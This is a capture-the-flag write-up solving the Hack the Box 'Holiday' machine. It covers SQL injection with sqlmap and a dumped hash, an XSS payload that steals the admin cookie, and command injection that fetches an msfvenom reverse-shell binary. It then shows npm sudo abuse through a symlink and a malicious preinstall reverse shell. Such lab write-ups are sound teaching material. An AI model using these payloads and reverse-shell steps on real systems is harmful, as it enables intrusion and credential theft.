Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.
Level: Expert !!
Task: find user.txt and root.txt file on victim’s machine.
Let’s begin with nmap port enumeration.
nmap -A -p- 10.10.10.25 --open
As port 8000 is running http we open the IP address in the browser, and find a webpage.
We didn’t find anything on the webpage so we use dirb to enumerate the directories.
1
|
dirb http://10.10.10.25:8000
|
Dirb scan gives us a link to a directory called /login, we open the link and find a login page.
We capture the login request using burpsuite. We use random credentials as placeholder.
We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.
c:\SQLMAP>sqlmap.py -r sql.txt --level 5 --risk 3 --batch --dbms=SQLite -T users --columns --dump --threads 10 --batch ___ __H__ ___ ___[,]_____ ___ ___ {1.2.11.19#dev} |_ -| . [.] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [*] starting @ 12:41:27 /2018-11-29/ [12:41:27] [INFO] parsing HTTP request from 'sql.txt' [12:41:28] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=admin") OR NOT 5230=5230 AND ("qZXC"="qZXC&password=admin --- [12:41:28] [INFO] testing SQLite [12:41:28] [INFO] confirming SQLite [12:41:28] [INFO] actively fingerprinting SQLite [12:41:28] [INFO] the back-end DBMS is SQLite back-end DBMS: SQLite [12:41:28] [INFO] resuming partial value: CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT [12:41:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [12:41:28] [INFO] retrieved: ,active TINYINT(1)) Database: SQLite_masterdb Table: users [4 columns] +----------+---------+ | Column | Type | +----------+---------+ | active | TINYINT | | id | INTEGER | | password | TEXT | | username | TEXT | +----------+---------+ -snip- Database: SQLite_masterdb Table: users [1 entry] +----+--------+----------+----------------------------------+ | id | active | username | password | +----+--------+----------+----------------------------------+ | 1 | 1 | RickA | fdc8cd4cff2c19e0d1022e78481ddf36 | +----+--------+----------+----------------------------------+ [12:42:31] [INFO] table 'SQLite_masterdb.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.25\dump\SQLite_masterdb\users.csv' [*] ending @ 12:42:31 /2018-11-29/ c:\SQLMAP>
We use hashkiller.co.uk to decrypt the hash and find the password to the user. : nevergonnagiveyouup
We login using these credentials and we are redirected to a page with that looks like it contains user information.
We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.
We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.
We post the note to bypass the filter we have to use this payload:
1
|
<img src=”x/><script>eval(String.CharCode(<payload>));</script>”>
|
We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.
1
|
nc –lvp 80
|
After waiting for 1 minute we received the admin cookie.
The cookie is url encoded we decode and use it hijack the administrator session.
We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.
As soon as we forward the request, we are able to successfully hijack the administrator session.
We now go to /admin directory and find a page where there are options to export bookings and notes.
We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.
We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.
1
|
msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 –f elf > shell
|
After creating a shell, we create a python http server to upload into the target machine.
Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we can bypass the filter.
We upload the shell using wget command into the target machine and save it in /tmp directory.
As soon as we run the command we get a prompt that shell is uploaded.
We give our payload read, write and execute permission using command injection.
Now we setup our listener using metasploit.
1
2
3
4
5
|
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.8
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
|
We run the shell using command injection vulnerability on the target machine.
As soon as we run the shell we get a reverse shell.
We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.
1
2
|
python –c “import pty; pty.spawn(‘/bin/bash’)”
sudo –l
|
Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.
Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json
1
|
ln –s /root/root.txt package.json
|
We run /usr/bin/npm i * as root user and find the final flag.
After searching through google we find a way to get reverse shell using a package called rimrafall.
We setup rimrafall by following the instructions given on the webpage.
We setup the json file and change the preinstalled script to bash one liner.
We run the command as root user to get privileged shell.
1
|
sudo npm i rimrafall —unsafe
|
We setup the listener as soon as we run the preinstalled shell is getting executed we get a reverse shell.
1
|
nc –nvlp 1234
|
We go to /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.
Author: Sayantan Bera